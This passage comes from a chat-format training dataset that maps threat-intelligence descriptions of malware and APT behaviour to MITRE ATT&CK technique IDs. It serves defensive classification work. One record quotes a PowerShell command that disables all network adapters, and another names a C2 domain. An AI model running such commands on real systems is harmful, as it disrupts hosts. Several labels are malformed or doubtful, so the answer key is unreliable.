{ "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FunnyDream can identify files with .doc, .docx, .ppt, .pptx, .xls, .xlsx, and .pdf extensions and specific timestamps for collection." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "H1N1 has added a plethora of new functionality in comparison to earlier reports. Throughout this blog series we will be analyzing the capabilities of H1N1 including: obfuscation, a User Account Control (UAC) bypass, information stealing, data exfiltration, loader/dropper, and self-propagation/lateral movement techniques used by this variant.1,2" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "cmd is used to execute programs and other actions at the command-line interface." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has used JavaScript for drive-by downloads and C2 communications." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The paths discovered are: • C:\\Users\\leo\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd • C:\\Users\\poopak\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd • C:\\Users\\Vendetta\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd • C:\\Users\\Turk\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd Leo, Poopak, Vendetta and Turk are the usernames of those creating the documents or the templates on which they are based" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery', 'T1005 - Data from Local System', 'T1087 - Account Discovery', 'T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT can steal credentials by leveraging the Windows Vault mechanism." }, { "role": "assistant", "content": "T1555.004 - Credentials from Password Stores: Windows Credential Manager" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PingPull can mimic the names and descriptions of legitimate services such as `iphlpsvc`, `IP Helper`, and `Onedrive` to evade detection." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The threat actor initially conducts system reconnaissance to assess the AV software installed and the user privilege" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If the user clicks on the link, he will be prompted to download a RAR file that contains the stage 1 malware/lure, which he will execute afterwards" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Additional tools were recovered during the incident, including a network scanning/enumeration tool, the archiving tool WinRAR and a bespoke Microsoft SharePoint enumeration and data dumping tool, known as ‘spwebmember" }, { "role": "assistant", "content": "T1213.002 - Sharepoint', 'T1018 - Remote System Discovery', 'T1213.002 - Sharepoint" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32's macOS backdoor hides the clientID file via a chflags function." }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbanak lists running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Night Dragon, threat actors used zwShell to establish full remote control of the connected machine and run command-line shells." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PROMETHIUM has named services to appear legitimate." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If so, it stops the execution and deletes the folder containing the malicious script from this machine. Download the malicious files onto the machine: the same batch file downloads a cab archive named env.cab from a remote address in the internal network: \\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab. The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. It moves wiper-related files to “C:\\temp” and creates a scheduled task named mstask to execute the wiper only once at 23:55:00" }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This process executes a command to maliciously use the legitimate wmic.exe to initialize an XSL Script Processing (MITRE Technique T1220) attack. The attack executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain (qnccmvbrh.wilstonbrwsaq[.]pw" }, { "role": "assistant", "content": "T1220 - XSL Script Processing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used PowerShell for execution of a payload." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SLOTHFULMEDIA has downloaded files onto a victim machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has exfiltrated internal documents, files, and other data from compromised hosts." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has delivered and by executing PowerShell commands through DDE in Word documents." }, { "role": "assistant", "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Smoke Loader searches through Outlook files and directories (e.g., inbox, sent, templates, drafts, archives, etc.)." }, { "role": "assistant", "content": "T1114.001 - Email Collection: Local Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Drovorub can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OnionDuke uses Twitter as a backup C2." }, { "role": "assistant", "content": "T1102.003 - One-Way Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For FunnyDream, the threat actors likely established an identified email account to register a variety of domains that were used during the campaign." }, { "role": "assistant", "content": "T1585.002 - Email Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MoleNet can download additional payloads from the C2." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Introduced in macOS 10.11, this utility has only one publicly documented use, which is to return the status of the System Integrity Protection tool. The csrutil tool is commonly used by malware and post-exploitation tools to determine whether certain files and directories on the system are writable or not" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sakula calls cmd.exe to run various DLL files via rundll32." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "JAVASCRIPT CODE SNIPPETS: The first stage JavaScript copies additional JavaScript code snippets in txt format from the RTF document into a random directory “C:\\Users\\\\\\”" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a batch file that modifies Registry keys to launch a DLL into the svchost.exe process." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWRUNER may also receive batch commands from the C2 server to collect host information from the system" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery', 'T1057 - Process Discovery', 'T1047 - Windows Management Instrumentation', 'T1049 - System Network Connections Discovery', 'T1016 - System Network Configuration Discovery', 'T1082 - System Information Discovery', 'T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It also allows macro code to access internal VBA objects for stealthier macro code execution in future attacks" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Commands such as net view can be used in to gather information about available remote systems." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The attackers used the Windows Management Instrumentation Command Line Utility (wmic.exe) to execute commands on remote computers, such as adding a new user or executing additional downloaded PowerShell scripts. Cobalt Strike was also used to carry out credential dumping using ProcDump and to empty log files" }, { "role": "assistant", "content": "T1136 - Create Account', 'T1047 - Windows Management Instrumentation', 'T1070.001 - Indicator Removal on Host: Clear Windows Event Logs', 'T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole uses a variation of the XOR cipher to encrypt files before exfiltration." }, { "role": "assistant", "content": "T1560.003 - Archive via Custom Method" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Qakbot has anti-analysis and anti-virtual machine checks. It will not continue to execute if any of the following exists in the system" }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Transparent Tribe has directed users to open URLs hosting malicious content." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FinFisher obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list in order to check for sandbox/virtualized environments." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NotPetya drops PsExec with the filename dllhost.dat." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used various forms of spearphishing in attempts to get users to open links or attachments." }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fysbis can perform keylogging." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Raindrop used a custom packer for its Cobalt Strike payload, which was compressed using the LZMA algorithm." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Decrypting the Configuration As previously mentioned, the real configuration data is stored in the first stage shellcode but it is not stored in cleartext, but encrypted and compressed" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Frankenstein has run a command script to set up persistence as a scheduled task named \"WinUpdate\", as well as other encoded commands from the command-line." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WastedLocker aims to encrypt the files of the infected host. However before the encryption procedure runs, WastedLocker performs a few other tasks to ensure the ransomware will run properly" }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAFNIUM has used ASCII encoding for C2 traffic." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can use process hollowing for execution." }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses Base64 encoding for communication in the message body of an HTTP request." }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has deployed backup web shells and obtained OWA account credentials during intrusions that it subsequently used to attempt to regain access when evicted from a victim network." }, { "role": "assistant", "content": "T1108 - Redundant Access" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We had previously observed this same IP scanning for TCP port 7001 throughout May 2018. This was potentially a scan for Oracle WebLogic servers, which listens on TCP port 7001 by default. In both our samples, as well as the ones that Morpheus Labs described, the hard-coded password was not only identical, but also located at the same offset" }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attor has automatically collected data about the compromised system." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mustang Panda APT uses a package of binaries to load the actual payload and it is intentionally designed this way to bypass file scanners and sandboxes. Obviously, file scanners or sandboxes can’t detect the PlugX payload without the encrypted DAT file" }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emotet could be dropping malware with Remote Access Trojan (RAT) capabilities damaging the integrity of the overall network. After reviewing systems for Emotet indicators, reimage and move clean systems to a containment VLAN, segregated from the infected network. It is possible that the Outlook account may now have rules to auto-forward all emails to an external email address, which could result in a data breach. Search base64 encoded network stream data referencing the organization’s email domain. If references are found, perform additional analysis to see if a data breach has occurred" }, { "role": "assistant", "content": "T1114.001 - Email Collection: Local Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once the malware starts it tries to reach a hardcoded C2. The communication takes place using the unmodified HTTP-based protocol, the request and response body are RC4-encrypted, and the encryption key is also hardcoded into the sample" }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Meteor can disconnect all network adapters on a compromised host using `powershell -Command \"Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($.NetEnabled) { $.Disable() } }\" > NUL`." }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains a command to collect the victim PC name and operating system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects the victim’s computer name, processor architecture, OS version, and volume serial number." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has a HWP document stealer module which changes the default program association in the registry to open HWP documents." }, { "role": "assistant", "content": "T1546.001 - Event Triggered Execution: Change Default File Association" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The script sets up a new HTTP object and then tries to disable the system's local proxy settings" }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "httpclient uses HTTP for command and control." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has exfiltrated stolen data to Dropbox using a customized version of dbxcli." }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Squirrelwaffle has used HTTP POST requests for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GreyEnergy modifies conditions in the Registry and adds keys." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FELIXROOT checks for installed security software like antivirus and firewall." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bandook can detect USB devices." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gorgon Group has obtained and used tools such as QuasarRAT and Remcos." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In order to encrypt network shares, BitPaymer will attempt to enumerate the sessions for each user logged onto the infected host and create a new process, using the token of each user. These new processes will first spawn a net.exe processing with the view argument to gather a list of network accessible hosts. For each host, BitPaymer spawns another net.exe process with command net view <host> using the newly discovered host as a parameter. This will return a list of network shares available to the impersonated user on the host. Once a list of all available shares has been gathered, BitPaymer attempts to mount them to be encrypted" }, { "role": "assistant", "content": "T1135 - Network Share Discovery', 'T1134.001 - Access Token Manipulation: Token Impersonation/Theft" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Xbash can use scripts to invoke PowerShell to download a malicious PE executable or PE DLL for execution." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The use of the web bug reconnaissance technique suggests TA416 is being more discerning about which targets the group chooses to deliver malware payloads. Historically, the group primarily delivered web bug URLs alongside malware URLs to confirm receipt. In 2022, the group started to first profile users and then deliver malware URLs. This may be an attempt by TA416 to avoid having their malicious tools discovered and publicly disclosed. By narrowing the lens of targeting from broad phishing campaigns to focus on targets that have proven to be active and willing to open emails, TA416 increases its chance of success when following up with malicious malware payloads" }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "According to the server’s code, the default command that it would issue to newly infected systems was a batch script contained in a file named 0000000000.bat" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoisonIvy creates a Registry key in the Active Setup pointing to a malicious executable." }, { "role": "assistant", "content": "T1547.014 - Active Setup" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CosmicDuke exfiltrates collected files automatically over FTP to remote servers." }, { "role": "assistant", "content": "T1020 - Automated Exfiltration" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The other infection chain involves an attached .XLS file containing an Excel formula that utilizes a PowerShell command (Figure 2) to access paste.ee, a Pastebin alternative, that accesses a second encrypted PowerShell command (Figure 3)." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1566.001 - Phishing: Spearphishing Attachment', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shamoon has used HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clop can use code signing to evade detection." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware communicates to its command server using HTTP with an encrypted payload." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoetRAT has exfiltrated data over the C2 channel." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoetRAT checked the size of the hard drive to determine if it was being run in a sandbox environment. In the event of sandbox detection, it would delete itself by overwriting the malware scripts with the contents of \"License.txt\" and exiting." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bazar can create a task named to appear benign." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pupy has a built-in utility command for \"netstat\", can do net session through PowerView, and has an interactive shell which can be used to discover additional information." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back." }, { "role": "assistant", "content": "T1104 - Multi-Stage Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ComRAT can check the default browser by querying \"HKCR\\http\\shell\\open\\command\"." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackTech has used built-in API functions." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One interesting thing to note is that the Keybase account used by the attacker to chat with their victims has the same logo of the Pay2Key EOSIO smart contract system" }, { "role": "assistant", "content": "T1585 - 